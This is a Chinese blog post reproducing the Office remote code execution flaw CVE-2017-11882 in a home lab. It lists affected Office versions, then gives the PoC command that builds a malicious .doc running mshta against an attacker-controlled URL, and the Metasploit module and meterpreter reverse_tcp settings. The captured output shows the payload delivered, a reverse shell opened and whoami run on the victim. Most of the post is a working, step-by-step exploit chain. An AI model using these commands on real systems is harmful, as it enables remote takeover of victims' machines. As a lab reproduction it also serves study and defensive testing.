CVE-2017-11882复现

CVE-2017-11882

 2018/09/18   Share

0x00 漏洞简介

2017年11月14日，微软发布了11月份的安全补丁更新，其中比较引人关注的莫过于悄然修复了潜伏17年之久的Office远程代码执行漏洞（CVE-2017-11882）。该漏洞为Office内存破坏漏洞，影响目前流行的所有Office版本。攻击者可以利用漏洞以当前登录的用户的身份执行任意命令。由于漏洞影响面较广，漏洞披露后，金睛安全研究团队持续对漏洞相关攻击事件进行关注。11月19日，监控到了已有漏洞POC在网上流传，随即迅速对相关样本进行了分析。目前该样本全球仅微软杀毒可以检测。

漏洞影响版本：
Office 365
Microsoft Office 2000
Microsoft Office 2003
Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2
Microsoft Office 2013 Service Pack 1
Microsoft Office 2016

0x01 利用工具清单：

a) tcp反弹：kali 192.168.1.5
b) 安装office2016的系统：win7 192.168.1.7

0x02 利用过程

下载poc

github

生成msf利用的doc

1
2
3

threst@threst:~/Pentest/poc/CVE-2017-11882$ python Command43b_CVE-2017-11882.py -c "mshta http://192.168.1.5:8080/abc" -o cve.doc
[*] Done ! output file --> cve.doc
threst@threst:~/Pentest/poc/CVE-2017-11882$ sudo cp cve.doc /var/www/html/

msf配置Poc：

开启metasploit
msfconsole
使用11882模块
use exploit/windows/smb/cve-2017-11882
设置payload
set payload windows/meterpreter/reverse_tcp

设置选项

msf exploit(windows/smb/cve-2017-11882) > set lhost 192.168.1.5
lhost => 192.168.1.5
msf exploit(windows/smb/cve-2017-11882) > set URIPATH abc
URIPATH => abc
msf exploit(windows/smb/cve-2017-11882) > options 

Module options (exploit/windows/smb/cve-2017-11882):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  abc              no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.5      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(windows/smb/cve-2017-11882) > exploit 
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.5:4444 
[*] Using URL: http://0.0.0.0:8080/abc
msf exploit(windows/smb/cve-2017-11882) > [*] Local IP: http://192.168.1.5:8080/abc
[*] Server started.
[*] Place the following DDE in an MS document:
mshta.exe "http://192.168.1.5:8080/abc"
[*] 192.168.1.7      cve-2017-11882 - Delivering payload
[*] Sending stage (179779 bytes) to 192.168.1.7
[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 192.168.1.7:58478) at 2018-09-18 13:16:55 +0800

win7用360极速浏览器打开http://192.168.1.5:8080/abc

msf exploit(windows/smb/cve-2017-11882) > sessions -i 1 
[*] Starting interaction with 1...

meterpreter > shell
Process 1440 created.
Channel 1 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

C:\Users\threst\AppData\Local\360Chrome\Chrome\Application\9.5.0.138>whoami
whoami
threst-pc\threst

参考

https://www.cnblogs.com/i-honey/p/7885573.html

原文作者: threst

原文链接: https://threst.github.io/2018/09/18/cve-2017-11882/

发表日期: September 18th 2018, 1:34:14

Next Post

网鼎杯wp
Previous Post

noxctf2018wp

CATALOG

1. 0x00 漏洞简介
2. 0x01 利用工具清单：
3. 0x02 利用过程
4. 参考



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true